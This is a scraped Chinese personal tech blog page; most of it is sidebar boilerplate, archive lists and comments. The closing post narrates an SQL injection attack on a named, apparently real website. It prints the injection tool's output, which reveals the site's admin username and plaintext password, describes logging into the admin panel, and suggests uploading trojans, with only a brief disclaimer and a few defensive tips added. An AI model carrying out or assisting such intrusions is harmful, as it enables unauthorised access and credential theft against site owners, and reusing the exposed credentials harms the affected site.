){kind=link}
欢迎来到Kittow的部落格! - http://blog.skyhe.com
Agile Web Development (敏捷Web开发)
Want to Know Something More? Move Your Mouse Here;)我是天空的一片云,偶尔投影在你的波心,你记得也好,最好你忘掉,你我在交汇时,互放的光亮。
——徐志摩《偶然》 More...
首页
关于
Introduce Myself kittow (天笑)
5月16日
生于80年代
中国大陆,四川
编程、篮球、数码、旅游
否则你无法体会到淋漓尽致的
快乐和痛苦!............
程序提供 天河网
5月16日
生于80年代
中国大陆,四川
编程、篮球、数码、旅游
最想说的话:
生活和工作要充满激情,否则你无法体会到淋漓尽致的
快乐和痛苦!............
程序提供 天河网
现状
My Actuality 状况 工作ing
感情 Secret
职业 挨踢(IT)
然后打篮球,再循环……
Click Here!
Focus on WEB Application
and Software Engineering
感情 Secret
职业 挨踢(IT)
正在做的事情:
编程、看书、看综艺、然后打篮球,再循环……
技术能力:范围&程度
More about my capability?Click Here!
Focus on WEB Application
and Software Engineering
我正在看的
Reading岁月
My Album统计
System Counts搜索
Research分类
Sorts List ASP |  ASP.NET |  PHP |
 ColdFusion |  Perl |  Python |
资源|信息(98)
原创内容(25)
BT转贴(72)
Web 2.0|网站建设(25)
软件工程|管理(24)
数据库|T-SQL(12)
ASP(25)
ASP.NET(29)
Web Framework(14)
.Net Remoting(3)
O/R Mapping(5)
XML|XLST|VML(4)
Ajax(4)
Java(1)
Python(3)
PHP(2)
组件开发(10)
模板技术(8)
虚拟机(1)
移动开发(5)
CMS内容管理(17)
SOA(3)
存档
Archive List 2024年4月的日志
2024年3月的日志
2024年2月的日志
2024年1月的日志
2023年12月的日志
2023年11月的日志
2023年10月的日志
2023年9月的日志
2023年8月的日志
2023年7月的日志
2023年6月的日志
2023年5月的日志
2023年4月的日志
2023年3月的日志
2023年2月的日志
2023年1月的日志
2022年12月的日志
2022年11月的日志
2022年10月的日志
2022年9月的日志
2022年8月的日志
2022年7月的日志
2022年6月的日志
2022年5月的日志
2022年4月的日志
2022年3月的日志
2022年2月的日志
2022年1月的日志
2021年12月的日志
2021年11月的日志
2021年10月的日志
2021年9月的日志
2021年8月的日志
2021年7月的日志
2021年6月的日志
2021年5月的日志
2021年4月的日志
2021年3月的日志
2021年2月的日志
2021年1月的日志
2020年12月的日志
2020年11月的日志
2020年10月的日志
2020年9月的日志
2020年8月的日志
2020年7月的日志
2020年6月的日志
2020年5月的日志
2020年4月的日志
2020年3月的日志
2020年2月的日志
2020年1月的日志
2019年12月的日志
2019年11月的日志
2019年10月的日志
2019年9月的日志
2019年8月的日志
2019年7月的日志
2019年6月的日志
2019年5月的日志
2019年4月的日志
2019年3月的日志
2019年2月的日志
2019年1月的日志
2018年12月的日志
2018年11月的日志
2018年10月的日志
2018年9月的日志
2018年8月的日志
2018年7月的日志
2018年6月的日志
2018年5月的日志
2018年4月的日志
2018年3月的日志
2018年2月的日志
2018年1月的日志
2017年12月的日志
2017年11月的日志
2017年10月的日志
2017年9月的日志
2017年8月的日志
2017年7月的日志
2017年6月的日志
2017年5月的日志
2017年4月的日志
2017年3月的日志
2017年2月的日志
2017年1月的日志
2016年12月的日志
2016年11月的日志
2016年10月的日志
2016年9月的日志
2016年8月的日志
2016年7月的日志
2016年6月的日志
2016年5月的日志
2016年4月的日志
2016年3月的日志
2016年2月的日志
2016年1月的日志
2015年12月的日志
2015年11月的日志
2015年10月的日志
2015年9月的日志
2015年8月的日志
2015年7月的日志
2015年6月的日志
2015年5月的日志
2015年4月的日志
2015年3月的日志
2015年2月的日志
2015年1月的日志
2014年12月的日志
2014年11月的日志
2014年10月的日志
2014年9月的日志
2014年8月的日志
2014年7月的日志
2014年6月的日志
2014年5月的日志
2014年4月的日志
2014年3月的日志
2014年2月的日志
2014年1月的日志
2013年12月的日志
2013年11月的日志
2013年10月的日志
2013年9月的日志
2013年8月的日志
2013年7月的日志
2013年6月的日志
2013年5月的日志
2013年4月的日志
2013年3月的日志
2013年2月的日志
2013年1月的日志
2012年12月的日志
2012年11月的日志
2012年10月的日志
2012年9月的日志
2012年8月的日志
2012年7月的日志
2012年6月的日志
2012年5月的日志
2012年4月的日志
2012年3月的日志
2012年2月的日志
2012年1月的日志
2011年12月的日志
2011年11月的日志
2011年10月的日志
2011年9月的日志
2011年8月的日志
2011年7月的日志
2011年6月的日志
2011年5月的日志
2011年4月的日志
2011年3月的日志
2011年2月的日志
2011年1月的日志
2010年12月的日志
2010年11月的日志
2010年10月的日志
2010年9月的日志
2010年8月的日志
2010年7月的日志
2010年6月的日志
2010年5月的日志
2010年4月的日志
2010年3月的日志
2010年2月的日志
2010年1月的日志
2009年12月的日志
2009年11月的日志
2009年10月的日志
2009年9月的日志
2009年8月的日志
2009年7月的日志
2009年6月的日志
2009年5月的日志
2009年4月的日志
2009年3月的日志
2009年2月的日志
2009年1月的日志
2008年12月的日志
2008年11月的日志
2008年10月的日志
2008年9月的日志
2008年8月的日志
2008年7月的日志
2008年6月的日志
2008年5月的日志
2008年4月的日志
2008年3月的日志
2008年2月的日志
2008年1月的日志
2007年12月的日志
2007年11月的日志
2007年10月的日志
2007年9月的日志
2007年8月的日志
2007年7月的日志
2007年6月的日志
2007年5月的日志
2007年4月的日志
2007年3月的日志
2007年2月的日志
2007年1月的日志
2006年12月的日志
2006年11月的日志
2006年10月的日志
2006年9月的日志
2006年8月的日志
2006年7月的日志
2006年6月的日志
2006年5月的日志
2006年4月的日志
2006年3月的日志
2006年2月的日志
2006年1月的日志
2005年12月的日志
2005年11月的日志
2005年10月的日志
2005年9月的日志
2005年8月的日志
2005年7月的日志
2005年6月的日志
2005年5月的日志
2005年4月的日志
2005年3月的日志
2005年2月的日志
2005年1月的日志
2004年12月的日志
2004年11月的日志
2004年10月的日志
2004年9月的日志
2004年8月的日志
2004年7月的日志
2004年6月的日志
2004年5月的日志
2004年4月的日志
2004年3月的日志
2004年2月的日志
2004年1月的日志
2003年12月的日志
2003年11月的日志
2003年10月的日志
2003年9月的日志
2003年8月的日志
2003年7月的日志
2003年6月的日志
2003年5月的日志
2003年4月的日志
2003年3月的日志
2003年2月的日志
2003年1月的日志
2002年12月的日志
2002年11月的日志
2024年3月的日志
2024年2月的日志
2024年1月的日志
2023年12月的日志
2023年11月的日志
2023年10月的日志
2023年9月的日志
2023年8月的日志
2023年7月的日志
2023年6月的日志
2023年5月的日志
2023年4月的日志
2023年3月的日志
2023年2月的日志
2023年1月的日志
2022年12月的日志
2022年11月的日志
2022年10月的日志
2022年9月的日志
2022年8月的日志
2022年7月的日志
2022年6月的日志
2022年5月的日志
2022年4月的日志
2022年3月的日志
2022年2月的日志
2022年1月的日志
2021年12月的日志
2021年11月的日志
2021年10月的日志
2021年9月的日志
2021年8月的日志
2021年7月的日志
2021年6月的日志
2021年5月的日志
2021年4月的日志
2021年3月的日志
2021年2月的日志
2021年1月的日志
2020年12月的日志
2020年11月的日志
2020年10月的日志
2020年9月的日志
2020年8月的日志
2020年7月的日志
2020年6月的日志
2020年5月的日志
2020年4月的日志
2020年3月的日志
2020年2月的日志
2020年1月的日志
2019年12月的日志
2019年11月的日志
2019年10月的日志
2019年9月的日志
2019年8月的日志
2019年7月的日志
2019年6月的日志
2019年5月的日志
2019年4月的日志
2019年3月的日志
2019年2月的日志
2019年1月的日志
2018年12月的日志
2018年11月的日志
2018年10月的日志
2018年9月的日志
2018年8月的日志
2018年7月的日志
2018年6月的日志
2018年5月的日志
2018年4月的日志
2018年3月的日志
2018年2月的日志
2018年1月的日志
2017年12月的日志
2017年11月的日志
2017年10月的日志
2017年9月的日志
2017年8月的日志
2017年7月的日志
2017年6月的日志
2017年5月的日志
2017年4月的日志
2017年3月的日志
2017年2月的日志
2017年1月的日志
2016年12月的日志
2016年11月的日志
2016年10月的日志
2016年9月的日志
2016年8月的日志
2016年7月的日志
2016年6月的日志
2016年5月的日志
2016年4月的日志
2016年3月的日志
2016年2月的日志
2016年1月的日志
2015年12月的日志
2015年11月的日志
2015年10月的日志
2015年9月的日志
2015年8月的日志
2015年7月的日志
2015年6月的日志
2015年5月的日志
2015年4月的日志
2015年3月的日志
2015年2月的日志
2015年1月的日志
2014年12月的日志
2014年11月的日志
2014年10月的日志
2014年9月的日志
2014年8月的日志
2014年7月的日志
2014年6月的日志
2014年5月的日志
2014年4月的日志
2014年3月的日志
2014年2月的日志
2014年1月的日志
2013年12月的日志
2013年11月的日志
2013年10月的日志
2013年9月的日志
2013年8月的日志
2013年7月的日志
2013年6月的日志
2013年5月的日志
2013年4月的日志
2013年3月的日志
2013年2月的日志
2013年1月的日志
2012年12月的日志
2012年11月的日志
2012年10月的日志
2012年9月的日志
2012年8月的日志
2012年7月的日志
2012年6月的日志
2012年5月的日志
2012年4月的日志
2012年3月的日志
2012年2月的日志
2012年1月的日志
2011年12月的日志
2011年11月的日志
2011年10月的日志
2011年9月的日志
2011年8月的日志
2011年7月的日志
2011年6月的日志
2011年5月的日志
2011年4月的日志
2011年3月的日志
2011年2月的日志
2011年1月的日志
2010年12月的日志
2010年11月的日志
2010年10月的日志
2010年9月的日志
2010年8月的日志
2010年7月的日志
2010年6月的日志
2010年5月的日志
2010年4月的日志
2010年3月的日志
2010年2月的日志
2010年1月的日志
2009年12月的日志
2009年11月的日志
2009年10月的日志
2009年9月的日志
2009年8月的日志
2009年7月的日志
2009年6月的日志
2009年5月的日志
2009年4月的日志
2009年3月的日志
2009年2月的日志
2009年1月的日志
2008年12月的日志
2008年11月的日志
2008年10月的日志
2008年9月的日志
2008年8月的日志
2008年7月的日志
2008年6月的日志
2008年5月的日志
2008年4月的日志
2008年3月的日志
2008年2月的日志
2008年1月的日志
2007年12月的日志
2007年11月的日志
2007年10月的日志
2007年9月的日志
2007年8月的日志
2007年7月的日志
2007年6月的日志
2007年5月的日志
2007年4月的日志
2007年3月的日志
2007年2月的日志
2007年1月的日志
2006年12月的日志
2006年11月的日志
2006年10月的日志
2006年9月的日志
2006年8月的日志
2006年7月的日志
2006年6月的日志
2006年5月的日志
2006年4月的日志
2006年3月的日志
2006年2月的日志
2006年1月的日志
2005年12月的日志
2005年11月的日志
2005年10月的日志
2005年9月的日志
2005年8月的日志
2005年7月的日志
2005年6月的日志
2005年5月的日志
2005年4月的日志
2005年3月的日志
2005年2月的日志
2005年1月的日志
2004年12月的日志
2004年11月的日志
2004年10月的日志
2004年9月的日志
2004年8月的日志
2004年7月的日志
2004年6月的日志
2004年5月的日志
2004年4月的日志
2004年3月的日志
2004年2月的日志
2004年1月的日志
2003年12月的日志
2003年11月的日志
2003年10月的日志
2003年9月的日志
2003年8月的日志
2003年7月的日志
2003年6月的日志
2003年5月的日志
2003年4月的日志
2003年3月的日志
2003年2月的日志
2003年1月的日志
2002年12月的日志
2002年11月的日志
评论
New Comments 在那论坛呆了很久,也没搞清FTP如何进入,相当复.
还有一个现在最著名的mc21网站:地址是http.
3两1:忙忙碌碌苦中求,何日云开见日头,难得祖基.
5两1:一世荣华事事通,不须劳碌自亨通,兄弟叔侄.
3两2:初年运错事难谋,渐有财源如水流,到的中年.
3两4:此命福气果如何,僧道门中衣禄多,离祖出家.
5两1:一世荣华事事通,不须劳碌自亨通,兄弟叔侄.
1986年出生重量,一两八
5两9:细推此格妙且清,必定才高礼仪通,甲第之中.
5两9:细推此格妙且清,必定才高礼仪通,甲第之中.
还有一个现在最著名的mc21网站:地址是http.
3两1:忙忙碌碌苦中求,何日云开见日头,难得祖基.
5两1:一世荣华事事通,不须劳碌自亨通,兄弟叔侄.
3两2:初年运错事难谋,渐有财源如水流,到的中年.
3两4:此命福气果如何,僧道门中衣禄多,离祖出家.
5两1:一世荣华事事通,不须劳碌自亨通,兄弟叔侄.
1986年出生重量,一两八
5两9:细推此格妙且清,必定才高礼仪通,甲第之中.
5两9:细推此格妙且清,必定才高礼仪通,甲第之中.
排行
Blog TOP10 DNN,Rainbow,Starter Kit等.
艺人全接触----周星驰
[原创]利用ASP上传漏洞得到webshell实.
ASP中有关双引号,单引号以及&号的解释
kittow's 技术能力:范围&程度
[原创]Web程序中采用FTP上传大文件资料
[原创]Squid反向代理的缓存(加速)服务器配.
ASP采用Jmail发送普通附件和嵌入附件(参考.
Django 中文教程
《让青春继续》第一季<初恋故事完整版>
艺人全接触----周星驰
[原创]利用ASP上传漏洞得到webshell实.
ASP中有关双引号,单引号以及&号的解释
kittow's 技术能力:范围&程度
[原创]Web程序中采用FTP上传大文件资料
[原创]Squid反向代理的缓存(加速)服务器配.
ASP采用Jmail发送普通附件和嵌入附件(参考.
Django 中文教程
《让青春继续》第一季<初恋故事完整版>
作品
Production Show联系
Contact Us友情链接
Friend Links蜗牛群
me博客园BLOG
me新浪BLOG
苹果树下的猫
黄峰
踏雪无痕
Vstart杨
狗々's BLOG
Tace's BLOG
QueenFather
梦幻老妖的BLOG
柯羽de博客
邓人文
翰林de博客
Cool@TT(隐锋)
雪域天堂(永强)
tingting's
王小平de博客
露竹(tsys)
佳伦网站运营
酷谷网
-----------技术专题-----------
CSS中文手册
CSS 在线编辑器
xml的实用技巧
简明Python教程
------------IT 专家------------
宝玉的blog(Web技术)
松耦合空间(IT大全)
Wayfarer(C#)
任宇's blog(C#)
MSDN最新文章
古典辣M°(hacker)
吕达嵘(真正的牛人)
慕容小语(hacker)
辣M°师父的BLOG
李想(PCPOP)
HongSoft(工作流)
圣殿祭祀
Fenng-DBA Notes
--------实用网址收藏--------
啄木鸟社区资料
python.cn
中文Zope用户组
Zope/Plone中文社区
Ruby On Rails 中文论坛
PhpMore
超越PHP
PHP开源大全
ChinaHtml 站长资讯
DoNews.Com
落伍论坛
WoodenHead.org
Dev2Dev
jakarta.apache
老顽童
CNOUG.org
Luzhu's Blog
ALEXA世界排名
其他
Others
蜀ICP备05000524号
实际演练了一下(只为测试,请勿模仿或者用文中方法攻击破坏!)第一,找目标,比如:
http://www.yldn.com/happy/
http://skyhe.com/down/pic/SQL_yldn1.jpg首先,用ASC进行站点分析:
http://skyhe.com/down/pic/SQL_yldn6.jpg
获得可注入的链接
http://www.yldn.com/happy/sort.asp?classid=1然后使用SQL注入工具进行注入、猜测、破解
http://skyhe.com/down/pic/SQL_yldn5.jpg
这里是破解过程和结果:
********************************************************
存在漏洞,以数值型方式注入开始!
可能存在 http://www.yldn.com/happy/admin
可能存在 http://www.yldn.com/happy/admin/index.asp
可能存在 http://www.yldn.com/happy/admin/manage.asp
可能存在 http://www.yldn.com/happy/../admin.asp
存在表 admin
存在账号字段 username
存在密码字段 password
用户名长度为 6位
密码长度为 8位
账号第1位是 z
账号第2位是 h
账号第3位是 p
账号第4位是 a
账号第5位是 y
账号第6位是 y
管理员名为 zhpayy
密码第1位是 6
密码第2位是 6
密码第3位是 3
密码第4位是 7
密码第5位是 1
密码第6位是 1
密码第7位是 4
密码第8位是 8
管理员密码为:66371148
所有检查完毕,请勿非法利用此结果信息!
*******************************************************用http://www.yldn.com/happy/admin/index.asp登陆管理员入口:
http://skyhe.com/down/pic/SQL_yldn2.jpg
哦哦!进来了!~~~
嘿嘿,如果想拿到更大的权限可以上传些木马!
我在这里就不多说了!
http://skyhe.com/down/pic/SQL_yldn3.jpg
http://skyhe.com/down/pic/SQL_yldn4.jpgkittow总结:
经过这次破解实战,我认识到网站安全要做到以下几点:
1、替换所有的返回参数、不论数值还是字符,杜绝SQL注入漏洞
2、管理员表一定不能用常见的admin之类
3、管理员密码一定要MD5加密,防止破解
4、数据库进行防下载处理
5、服务器端安全设置要充分,防止ASP木马等脚本木马的上传运行又UP UP UP~~~!!!^0^